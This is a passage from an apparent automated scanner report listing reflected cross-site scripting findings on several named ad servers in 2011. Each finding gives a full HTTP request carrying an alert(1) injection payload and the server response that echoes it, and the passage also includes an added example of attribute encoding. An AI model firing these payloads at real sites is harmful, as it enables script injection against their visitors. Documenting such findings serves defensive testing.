Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:10 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?&ddccb'-alert(1)-'fb58dd8594f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 660ee'-alert(1)-'ae4a32c4786 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?660ee'-alert(1)-'ae4a32c4786 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Sun, 02 Oct 2011 23:51:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E3184c20852dc099873bc3845; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:51:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?660ee'-alert(1)-'ae4a32c4786;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a54d'-alert(1)-'bfe528f9315 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian4a54d'-alert(1)-'bfe528f9315/;sz=300x250;net=cm;ord=$random$;env=ifr;ord1=63589;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:21 GMT
Content-Length: 8208
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-30314387801_1317599481","http://ib.adnxs.com/ptj?member=311&inv_code=cm.guardian4a54d'-alert(1)-'bfe528f9315&size=300x250&imp_id=cm-30314387801_1317599481,122eace26f8db51&referrer=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.guardian4a54d%27-
...[SNIP]...

4.5. http://a.collective-media.net/cmadj/cm.guardian/ [sz parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 264f9(a)bbc3f94df69 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.guardian/;sz=264f9(a)bbc3f94df69 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:51:16 GMT
Content-Length: 8074
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122eace26f8db51';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:264f9(a)bbc3f94df69,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

4.6. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c0a1"-alert(1)-"c16fe58ffb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=1&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250&9c0a1"-alert(1)-"c16fe58ffb9=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:01 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:01 GMT
Pragma: no-cache
Content-Length: 4413
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?9c0a1"-alert(1)-"c16fe58ffb9=1&Z=300x250&atf=1&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=339107265";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';i
...[SNIP]...

4.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec07e"><script>alert(1)</script>3f7f80201f0 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ec07e"><script>alert(1)</script>3f7f80201f0&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=3497789830921369198&fpid=ec07e"><script>alert(1)</script>3f7f80201f0&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.8. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f88"><script>alert(1)</script>8138f9b958e was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=99f88"><script>alert(1)</script>8138f9b958e HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:52 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=9036514181597041788&fpid=1&nu=n&t=&sp=99f88"><script>alert(1)</script>8138f9b958e&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e961"-alert(1)-"cb5fec4d025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=468x60&section=2398370&8e961"-alert(1)-"cb5fec4d025=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:49:07 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?8e961"-alert(1)-"cb5fec4d025=1&Z=468x60&s=2398370&_salt=2593956440";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd43b"><script>alert(1)</script>36334559423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2126909&dd43b"><script>alert(1)</script>36334559423=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:42 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:54:42 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&dd43b"><script>alert(1)</script>36334559423=1&s=2126909&_salt=328484640&t=2" target="_parent">
...[SNIP]...
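Issues 4.7, 4.8 and 4.10 share one pattern: a query-string value is rebuilt into a URL and that URL is dropped into a double-quoted HTML attribute (an iframe src, an anchor href) without encoding, so a value containing "><script> closes the attribute and the tag. The following is an added example, not code from the report or from any of the ad servers named in it; the function names (buildIframeVulnerable, buildIframeHardened, attrEncode, analyze) and the stand-in template are assumptions. It shows the two encoding layers a fix needs: percent-encode each value when it goes into the URL, then attribute-encode the whole URL when it goes into the tag, and it includes a small tokenizer-style check that reports where the src attribute actually ends.

```javascript
// Added example (not from the original report). Mirrors the turn.com pixel
// (4.7/4.8): a server template writes a user-supplied fpid into the src
// attribute of a hidden iframe. All names here are hypothetical.

// Vulnerable stand-in: raw concatenation into the URL and into the attribute.
function buildIframeVulnerable(fpid, uid) {
  return '<iframe name="turn_sync_frame" width="0" height="0" ' +
    'src="http://cdn.turn.com/server/ddc.htm?uid=' + uid +
    '&fpid=' + fpid + '&sp=y"></iframe>';
}

// Encoder for a double-quoted HTML attribute value. & is encoded too, so a
// literal &quot; in the input cannot be mistaken for a real quote later.
function attrEncode(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[c]);
}

// Hardened: percent-encode each URL component, then attribute-encode the URL.
// encodeURIComponent removes " < > / from the value entirely; attrEncode then
// turns the remaining & separators into &amp; so the attribute parses cleanly.
function buildIframeHardened(fpid, uid) {
  const url = 'http://cdn.turn.com/server/ddc.htm' +
    '?uid=' + encodeURIComponent(uid) +
    '&fpid=' + encodeURIComponent(fpid) +
    '&sp=y';
  return '<iframe name="turn_sync_frame" width="0" height="0" src="' +
    attrEncode(url) + '"></iframe>';
}

// Reviewer check: how many <script start tags are in the markup, and where
// does the src attribute end once a tokenizer reads up to the next " ?
function analyze(html) {
  const scriptTags = (html.match(/<script\b/gi) || []).length;
  const m = /\ssrc="([^"]*)"/.exec(html);
  return { scriptTags, src: m ? m[1] : null };
}

// Constructed input: the exact fpid payload from issue 4.7 and the uid seen
// in the captured cookie.
const PAYLOAD = 'ec07e"><script>alert(1)</script>3f7f80201f0';
const UID = '2944787775510337379';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(analyze(buildIframeVulnerable(PAYLOAD, UID)));
  console.log(analyze(buildIframeHardened(PAYLOAD, UID)));
}
```

In the vulnerable output the src attribute ends at fpid=ec07e and a live <script> element follows; in the hardened output there is no script tag and the entire URL, payload included, stays inside the attribute as inert percent-encoded text.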

4.11. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd3c"-alert(1)-"451a8231aa5 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

Note on the injection point: the scanner treats the whole semicolon-delimited tail of the path (;loc=100;target=...;rdclick=...) as the value of a single parameter named loc; the payload actually sits in the trailing rdclick segment and is reflected into the link= field of the click-through URL inside the AT_MULTICLICKSTR literal. That literal is wrapped in escape() on the client, which does not help: the injected double quote has already terminated the string at parse time, so alert(1) runs while the argument is being evaluated, before escape() is ever called.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=3bd3c"-alert(1)-"451a8231aa5 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599365384;key=key1+key2+key3+key4;nodecode=yes;link=3bd3c"-alert(1)-"451a8231aa5") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|9
...[SNIP]...

4.12. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 116c3'-alert(1)-'ce519b8c547 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

Note on the injection point: as in 4.11, "loc" here is the scanner's name for the whole ;loc=...;rdclick=... tail of the path; the payload sits in the rdclick segment and lands in the link= field of the single-quoted URL assigned to AT_COUNT. The surrounding escape() call runs after the literal has already been broken, so it offers no protection.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=116c3'-alert(1)-'ce519b8c547 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19701

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
!="")
{    AT_COUNT=''
if ('2046906'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599367009;key=key1+key2+key3+key4;nodecode=yes;link=116c3'-alert(1)-'ce519b8c547')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE2046906+"'))";
AT_TARGET2046906="_self";
}
window.AT_ClickFn2046906= function (click)
{    click=(isN
...[SNIP]...

4.13. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d5b"-alert(1)-"4f51d7bed73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick=&b0d5b"-alert(1)-"4f51d7bed73=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19731

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|999|2046906|0|2384|AdId=2515525;BnId=38;itime=599382601;key=key1+key2+key3+key4;nodecode=yes;link=&b0d5b"-alert(1)-"4f51d7bed73=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink
...[SNIP]...

4.14. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7beee'-alert(1)-'f8a39a000c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

